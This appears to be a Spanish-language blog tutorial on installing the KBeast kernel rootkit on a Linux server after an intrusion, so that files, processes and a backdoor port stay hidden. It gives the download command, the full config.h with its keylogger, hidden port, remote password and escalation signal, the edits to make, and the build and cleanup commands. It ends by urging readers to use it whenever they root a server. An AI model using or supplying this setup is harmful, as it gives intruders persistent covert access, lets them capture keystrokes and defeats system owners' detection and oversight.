Siempre es conveniente asegurarse el silencio luego de una intrusion, y con que me refiero al silencio? Ademas de entrar en el tema de borrado de huellas, me refiero a la accion de dejar un secuas en el servidor que se encargue de ocultar ciertos procesos, archivos, etc que dejemos en el target para esto voy a utilizar a KBeast que es un rootkit 2011, ademas de uno de mis preferidos, tiene soporte para los kernel 2.6.18 y 2.6.32,y presenta varias funcionalidades interesantes como:
-Ocultar archivos y directorios
-Ocultar procesos de (ps, pstree, top, lsof)
- Ocultar puertos locales abiertos (backdoors)
-Viene con un modulo keylogger incorporado para capturar las pulsaciones.
-Anti-kill para procesos
-Anti-remove para archivos
-Trae un backdoor bind incorporado
- Tambien se encarga de esconder ciertos modulos cargando en el kernel ademas de un anti-remove para estos.
Bastante completita la basura!, demas esta decir que requerimos de privilegios de usuario root, en este caso lo voy a realizar en un debian con un kernel 2.6.32 (entorno controlado)
Descargamos el rootkit.
1
| wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz |
Una vez extraido nos encontramos con varios files, tendremos que editar a nuestro antojo el archivo de configuracion config.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
| /*Kernel Beast Ver #1.0 - Configuration FileCopyright Ph03n1X of IPSECS (c) 2011Get more research of ours http://ipsecs.com*//*Don't change this line*/#define TRUE 1#define FALSE 0/*Enable keylog probably makes the system unstableBut worth to be tried*/#define _KEYLOG_ TRUE/*Define your module & network daemon name*/#define KBEAST "kbeast"/*All files, dirs, process will be hiddenProtected from deletion & being killed*/#define _H4X0R_ "_h4x_"/*Directory where your rootkit will be savedYou have to use _H4X0R_ in your directory nameNo slash (/) at the end*/#define _H4X_PATH_ "/usr/_h4x_"/*File to save key logged data*/#define _LOGFILE_ "acctlog"/*This port will be hidded from netstat*/#define _HIDE_PORT_ 13377/*Password for remote access*/#define _RPASSWORD_ "h4x3d"#define _MAGIC_NAME_ "bin"/*Magic signal & pid for local escalation*/#define _MAGIC_SIG_ 37 //kill signal#define _MAGIC_PID_ 31337 //kill this pid |
1- La primera linea la dejamos tal cual esta
2- la segunda se encarga de activar el modulo keylogger del rootkit en caso contrario escribimos
1
| #define _KEYLOG_ FALSE |
1
| #define KBEAST "q3rv0" |
1
| #define _H4X0R_ "/home/q3rv0/protect/q3rv0.txt" |
1
| #define _H4X_PATH_ "/usr/share/kbeast" |
1
| #define _LOGFILE_ "acctlog" |
1
| #define _HIDE_PORT_ 6666 |
1
2
| #define _RPASSWORD_ "q3rv0"#define _MAGIC_NAME_ "bin" |
Procedemos a lanzar el rootkit de la siguiente manera.
En los kernel 2.6.18
1
| ./setup buil 0 |
1
| ./setup build |
-Verificando la proteccion anti-remove de ficheros
- Directorio donde se guarda el rootkit en el systema
El fichero de log se guarda en el directorio donde le indicamos que se guarde el rootkit.
- Port 6666 Hide
- Accediendo al sistema a travez del backdoor en el puerto 6666
- oka, para remover el rootkit del kernel solo basta realizar un:
1
| ./setup clean |
Espero que lo hayan disfrutado y cada vez que rooteen un server acuerdense de kbeast
Saludos!
-________-
Cabe anotar que blogspot es algo malo para la citación de código y reducción de imagenes dejo el link para que visiten el post bien bonito y organizado:http://underterminal.nixiweb.com/?p=393#more-393
Entradas
No hay comentarios:
Publicar un comentario